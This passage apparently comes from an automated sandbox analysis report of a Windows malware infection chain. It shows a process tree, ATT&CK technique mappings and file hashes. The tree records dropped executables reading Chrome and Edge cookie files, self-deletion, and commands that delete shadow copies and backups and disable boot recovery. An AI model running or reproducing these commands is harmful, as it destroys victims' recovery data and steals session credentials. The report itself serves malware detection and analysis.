                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:4940
                                                              • C:\Users\Admin\Documents\7FILuCw0xkLtLsJ3P6OKgIrs.exe
                                                                "C:\Users\Admin\Documents\7FILuCw0xkLtLsJ3P6OKgIrs.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:576
                                                              • C:\Users\Admin\Documents\XzCQgF44qMcfv5YaIlsStphz.exe
                                                                "C:\Users\Admin\Documents\XzCQgF44qMcfv5YaIlsStphz.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:4252
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4728
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:5684
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  6⤵
                                                                    PID:5272
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    6⤵
                                                                      PID:6068
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sahiba_7.exe
                                                                3⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2084
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_7.exe
                                                                  sahiba_7.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:3148
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:4792
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    5⤵
                                                                      PID:4628
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:4812
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5048
                                                            • \??\c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                              1⤵
                                                              • Suspicious use of SetThreadContext
                                                              • Modifies registry class
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2992
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                2⤵
                                                                • Drops file in System32 directory
                                                                • Checks processor information in registry
                                                                • Modifies data under HKEY_USERS
                                                                • Modifies registry class
                                                                PID:3384
                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:200
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                2⤵
                                                                  PID:1096
                                                              • C:\Windows\system32\rundll32.exe
                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                1⤵
                                                                • Process spawned unexpected child process
                                                                PID:4108
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                  2⤵
                                                                  • Loads dropped DLL
                                                                  • Modifies registry class
                                                                  PID:1324
                                                              • C:\Windows\system32\rundll32.exe
                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                1⤵
                                                                • Process spawned unexpected child process
                                                                PID:5220
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                  2⤵
                                                                  • Loads dropped DLL
                                                                  • Modifies registry class
                                                                  PID:5236
                                                              • \??\c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                1⤵
                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                PID:6120
                                                              • C:\Users\Admin\AppData\Local\Temp\923E.exe
                                                                C:\Users\Admin\AppData\Local\Temp\923E.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:5132
                                                              • C:\Users\Admin\AppData\Local\Temp\E58F.exe
                                                                C:\Users\Admin\AppData\Local\Temp\E58F.exe
                                                                1⤵
                                                                • Loads dropped DLL
                                                                PID:740
                                                              • C:\Users\Admin\AppData\Local\Temp\E69A.exe
                                                                C:\Users\Admin\AppData\Local\Temp\E69A.exe
                                                                1⤵
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:5416
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im E69A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E69A.exe" & del C:\ProgramData\*.dll & exit
                                                                  2⤵
                                                                    PID:5032
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im E69A.exe /f
                                                                      3⤵
                                                                      • Kills process with taskkill
                                                                      PID:5808
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      3⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:5884
                                                                • C:\Users\Admin\AppData\Local\Temp\E9E7.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\E9E7.exe
                                                                  1⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:5456
                                                                  • C:\Users\Admin\AppData\Local\Temp\E9E7.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\E9E7.exe
                                                                    2⤵
                                                                      PID:5576
                                                                  • C:\Users\Admin\AppData\Local\Temp\F050.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\F050.exe
                                                                    1⤵
                                                                      PID:4628
                                                                    • C:\Users\Admin\AppData\Local\Temp\F2B3.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\F2B3.exe
                                                                      1⤵
                                                                        PID:3652
                                                                      • C:\Users\Admin\AppData\Local\Temp\F525.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\F525.exe
                                                                        1⤵
                                                                        • Enumerates connected drives
                                                                        PID:4372
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                          2⤵
                                                                            PID:6024
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              wmic shadowcopy delete
                                                                              3⤵
                                                                                PID:196
                                                                            • C:\Users\Admin\AppData\Local\Temp\F525.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\F525.exe" -agent 0
                                                                              2⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:5752
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                              2⤵
                                                                                PID:4296
                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                  vssadmin delete shadows /all /quiet
                                                                                  3⤵
                                                                                  • Interacts with shadow copies
                                                                                  PID:4060
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                2⤵
                                                                                  PID:5916
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                  2⤵
                                                                                    PID:4008
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                    2⤵
                                                                                      PID:6016
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:5352
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                        PID:2092
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:5720
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                            PID:4728
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:5756
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                                PID:1324
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:5924
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5648
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5056
                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                      1⤵
                                                                                                        PID:5280

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                      Execution

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053

                                                                                                      Persistence

                                                                                                      Modify Existing Service

                                                                                                      1
                                                                                                      T1031

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1060

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053

                                                                                                      Privilege Escalation

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053

                                                                                                      Defense Evasion

                                                                                                      Modify Registry

                                                                                                      2
                                                                                                      T1112

                                                                                                      Disabling Security Tools

                                                                                                      1
                                                                                                      T1089

                                                                                                      File Deletion

                                                                                                      2
                                                                                                      T1107

                                                                                                      Virtualization/Sandbox Evasion

                                                                                                      1
                                                                                                      T1497

                                                                                                      Credential Access

                                                                                                      Credentials in Files

                                                                                                      4
                                                                                                      T1081

                                                                                                      Discovery

                                                                                                      Query Registry

                                                                                                      7
                                                                                                      T1012

                                                                                                      Virtualization/Sandbox Evasion

                                                                                                      1
                                                                                                      T1497

                                                                                                      System Information Discovery

                                                                                                      7
                                                                                                      T1082

                                                                                                      Peripheral Device Discovery

                                                                                                      2
                                                                                                      T1120

                                                                                                      Collection

                                                                                                      Data from Local System

                                                                                                      4
                                                                                                      T1005

                                                                                                      Command and Control

                                                                                                      Web Service

                                                                                                      1
                                                                                                      T1102

                                                                                                      Impact

                                                                                                      Inhibit System Recovery

                                                                                                      2
                                                                                                      T1490

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                        MD5

                                                                                                        1e0572c8de9c9e2a2e9b310b4217daac

                                                                                                        SHA1

                                                                                                        14abc157f0bfcaf25fbc8efb8554ea46c85c6267

                                                                                                        SHA256

                                                                                                        425f75e018866d2a59a05a215ca97de6bceafeedac9890a29ff79705564a04e1

                                                                                                        SHA512

                                                                                                        87d1baae07f3226900482d34564b8b3b205a73ddafe05f123ddbcec08a497d3d78268928cfcdad84df9f0069503b3075c69244d07d8b4a5a18ff1d61708adb4e

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                        MD5

                                                                                                        4a95093b275cb197caf3b8b895ba7f36

                                                                                                        SHA1

                                                                                                        defe7f68261093bef6aac0b460eef6b7740dd255

                                                                                                        SHA256

                                                                                                        14b741a29cf29157f2e58594388e9cedcc6671095e555d11226536abb33b50a4

                                                                                                        SHA512

                                                                                                        830865a932c1419a2260020b907854da172f34d375840c08c3c297de4fca2d1667377958325b793f117f7de9347268474329cf5e4aa11ca2637aae08520ec12c

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        MD5

                                                                                                        cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                        SHA1

                                                                                                        b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                        SHA256

                                                                                                        0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                        SHA512

                                                                                                        4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        MD5

                                                                                                        cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                        SHA1

                                                                                                        b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                        SHA256

                                                                                                        0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                        SHA512

                                                                                                        4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                        MD5

                                                                                                        e511bb4cf31a2307b6f3445a869bcf31

                                                                                                        SHA1

                                                                                                        76f5c6e8df733ac13d205d426831ed7672a05349

                                                                                                        SHA256

                                                                                                        56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

                                                                                                        SHA512

                                                                                                        9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                        MD5

                                                                                                        e511bb4cf31a2307b6f3445a869bcf31

                                                                                                        SHA1

                                                                                                        76f5c6e8df733ac13d205d426831ed7672a05349

                                                                                                        SHA256

                                                                                                        56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

                                                                                                        SHA512

                                                                                                        9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                        MD5

                                                                                                        e511bb4cf31a2307b6f3445a869bcf31

                                                                                                        SHA1

                                                                                                        76f5c6e8df733ac13d205d426831ed7672a05349

                                                                                                        SHA256

                                                                                                        56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

                                                                                                        SHA512

                                                                                                        9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\libcurl.dll
                                                                                                        MD5

                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                        SHA1

                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                        SHA256

                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                        SHA512

                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\libcurlpp.dll
                                                                                                        MD5

                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                        SHA1

                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                        SHA256

                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                        SHA512

                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\libgcc_s_dw2-1.dll
                                                                                                        MD5

                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                        SHA1

                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                        SHA256

                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                        SHA512

                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\libstdc++-6.dll
                                                                                                        MD5

                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                        SHA1

                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                        SHA256

                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                        SHA512

                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\libwinpthread-1.dll
                                                                                                        MD5

                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                        SHA1

                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                        SHA256

                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                        SHA512

                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_1.exe
                                                                                                        MD5

                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                        SHA1

                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                        SHA256

                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                        SHA512

                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_1.exe
                                                                                                        MD5

                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                        SHA1

                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                        SHA256

                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                        SHA512

                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_1.txt
                                                                                                        MD5

                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                        SHA1

                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                        SHA256

                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                        SHA512

                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_2.exe
                                                                                                        MD5

                                                                                                        4a958b7f15d342fbaaed26da7b9a5628

                                                                                                        SHA1

                                                                                                        25e663702193dc851e7fd57005ef45d9e65077f4

                                                                                                        SHA256

                                                                                                        5b397fc6966368fc4b2c3302e0aa529d14de521a1ff2810a8145a7c574fa7709

                                                                                                        SHA512

                                                                                                        dab2955ea896b36f8c8854157dbee975afc13efb53335c940f2efc6d13aae7aafdd515fa156c866d243a93edf16ba20e1884559ed7621b7a1a4d26091980f43e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_2.txt
                                                                                                        MD5

                                                                                                        4a958b7f15d342fbaaed26da7b9a5628

                                                                                                        SHA1

                                                                                                        25e663702193dc851e7fd57005ef45d9e65077f4

                                                                                                        SHA256

                                                                                                        5b397fc6966368fc4b2c3302e0aa529d14de521a1ff2810a8145a7c574fa7709

                                                                                                        SHA512

                                                                                                        dab2955ea896b36f8c8854157dbee975afc13efb53335c940f2efc6d13aae7aafdd515fa156c866d243a93edf16ba20e1884559ed7621b7a1a4d26091980f43e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_3.exe
                                                                                                        MD5

                                                                                                        f809c50b80f2174789110a600b275b37

                                                                                                        SHA1

                                                                                                        20aa7fb314365ede1fbf5a25df1f29395abf1cd0

                                                                                                        SHA256

                                                                                                        f051c8c9fa1df14467635a1988bce0810b813979200405de9973059569d35dd7

                                                                                                        SHA512

                                                                                                        b846f75c7aae9216fce720155fd3fc93941b7df12eea3f3af1b93acef03121904d3baf76fdb26cdb0573391a394d3dbb260cc6bd71cae5b02eb31452129eed0e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_3.txt
                                                                                                        MD5

                                                                                                        f809c50b80f2174789110a600b275b37

                                                                                                        SHA1

                                                                                                        20aa7fb314365ede1fbf5a25df1f29395abf1cd0

                                                                                                        SHA256

                                                                                                        f051c8c9fa1df14467635a1988bce0810b813979200405de9973059569d35dd7

                                                                                                        SHA512

                                                                                                        b846f75c7aae9216fce720155fd3fc93941b7df12eea3f3af1b93acef03121904d3baf76fdb26cdb0573391a394d3dbb260cc6bd71cae5b02eb31452129eed0e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_4.exe
                                                                                                        MD5

                                                                                                        3338af5387be57396e2ab03cdd18271f

                                                                                                        SHA1

                                                                                                        e60e505a56fedd2f91e0ac4ec7267c270b86ebc3

                                                                                                        SHA256

                                                                                                        396adb904ebd81c2996a01520af921ef4bffedaf45b65d50d158e95a10c2b943

                                                                                                        SHA512

                                                                                                        f1173732a3a1e20c89f3c354bcaf9d9b737526dce6697044cfa65d130ec120f1b75148d6c7b881af892c507b112c050dc2218b71e9522f88da6aff2015524b33

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_4.txt
                                                                                                        MD5

                                                                                                        3338af5387be57396e2ab03cdd18271f

                                                                                                        SHA1

                                                                                                        e60e505a56fedd2f91e0ac4ec7267c270b86ebc3

                                                                                                        SHA256

                                                                                                        396adb904ebd81c2996a01520af921ef4bffedaf45b65d50d158e95a10c2b943

                                                                                                        SHA512

                                                                                                        f1173732a3a1e20c89f3c354bcaf9d9b737526dce6697044cfa65d130ec120f1b75148d6c7b881af892c507b112c050dc2218b71e9522f88da6aff2015524b33

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_5.exe
                                                                                                        MD5

                                                                                                        7ec7b612ff4f9771629ae397c77baf18

                                                                                                        SHA1

                                                                                                        0e10994968563b5f11dcbbb965023bc2404142e3

                                                                                                        SHA256

                                                                                                        f64759837bbb18960f5acab25fb18404c7bdb46312676672134ac2c00454befb

                                                                                                        SHA512

                                                                                                        07b5651fba5595456fe456c08783e613fe7c7c44805b910853a5c4d61fa2f25c6eb3bad39798c7459bc93b0805f2729b6f3200b635b88fac0d5afae23558ea67

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_5.txt
                                                                                                        MD5

                                                                                                        7ec7b612ff4f9771629ae397c77baf18

                                                                                                        SHA1

                                                                                                        0e10994968563b5f11dcbbb965023bc2404142e3

                                                                                                        SHA256

                                                                                                        f64759837bbb18960f5acab25fb18404c7bdb46312676672134ac2c00454befb

                                                                                                        SHA512

                                                                                                        07b5651fba5595456fe456c08783e613fe7c7c44805b910853a5c4d61fa2f25c6eb3bad39798c7459bc93b0805f2729b6f3200b635b88fac0d5afae23558ea67

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_6.exe
                                                                                                        MD5

                                                                                                        e44b6cb9e7111de178fbabf3ac1cba76

                                                                                                        SHA1

                                                                                                        b15d8d52864a548c42a331a574828824a65763ff

                                                                                                        SHA256

                                                                                                        c74894fe98864ade516c9e54f2258a23ed451feadfa2de53a7c626385b549b22

                                                                                                        SHA512

                                                                                                        24129e1de024d61bcc23654450f416307be3e7911de2baced47476e02cd7df737ce012f379eb0ea5d84367113619f53d6a80971ccc652a569d6b494150bbb6bf

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_6.txt
                                                                                                        MD5

                                                                                                        e44b6cb9e7111de178fbabf3ac1cba76

                                                                                                        SHA1

                                                                                                        b15d8d52864a548c42a331a574828824a65763ff

                                                                                                        SHA256

                                                                                                        c74894fe98864ade516c9e54f2258a23ed451feadfa2de53a7c626385b549b22

                                                                                                        SHA512

                                                                                                        24129e1de024d61bcc23654450f416307be3e7911de2baced47476e02cd7df737ce012f379eb0ea5d84367113619f53d6a80971ccc652a569d6b494150bbb6bf

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_7.exe
                                                                                                        MD5

                                                                                                        7eef13ea166d4795e7e2df97f6a97199

                                                                                                        SHA1

                                                                                                        f80c5425a60534595c409842d37268213dcc1f92

                                                                                                        SHA256

                                                                                                        22abf0e430b18088dcf4f889e33c8f1bdc9c918f908a2e450ab26a3db18d9d36

                                                                                                        SHA512

                                                                                                        3bfb99aaad774079083e9575c0184760cba8e58c65979a90126d6d292696c4bb66604bb02f7e5b575628269c617a42d943129c1ef56a10dd0c7ba9cf2f79d12f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_7.txt
                                                                                                        MD5

                                                                                                        7eef13ea166d4795e7e2df97f6a97199

                                                                                                        SHA1

                                                                                                        f80c5425a60534595c409842d37268213dcc1f92

                                                                                                        SHA256

                                                                                                        22abf0e430b18088dcf4f889e33c8f1bdc9c918f908a2e450ab26a3db18d9d36

                                                                                                        SHA512

                                                                                                        3bfb99aaad774079083e9575c0184760cba8e58c65979a90126d6d292696c4bb66604bb02f7e5b575628269c617a42d943129c1ef56a10dd0c7ba9cf2f79d12f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\setup_install.exe
                                                                                                        MD5

                                                                                                        8e316ec3b4d715862e31529b7c155aee

                                                                                                        SHA1

                                                                                                        1e1e1268bb609d92b3e778cecbdae4e97c1b5bb2

                                                                                                        SHA256

                                                                                                        ef5fbfafa5b4b138302c45631c72e699dd8ab43d93a77a19ba5a7b155a55d794

                                                                                                        SHA512

                                                                                                        3e0085b92a3d2105a6f5c5618701daf0341b34f37c9ec37fc13d3093694494536c1af1e7e66e45a6a0edd7fd2d34b720fd16c1cf6a976aa3b6a4939b0f291acc

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\setup_install.exe
                                                                                                        MD5

                                                                                                        8e316ec3b4d715862e31529b7c155aee

                                                                                                        SHA1

                                                                                                        1e1e1268bb609d92b3e778cecbdae4e97c1b5bb2

                                                                                                        SHA256

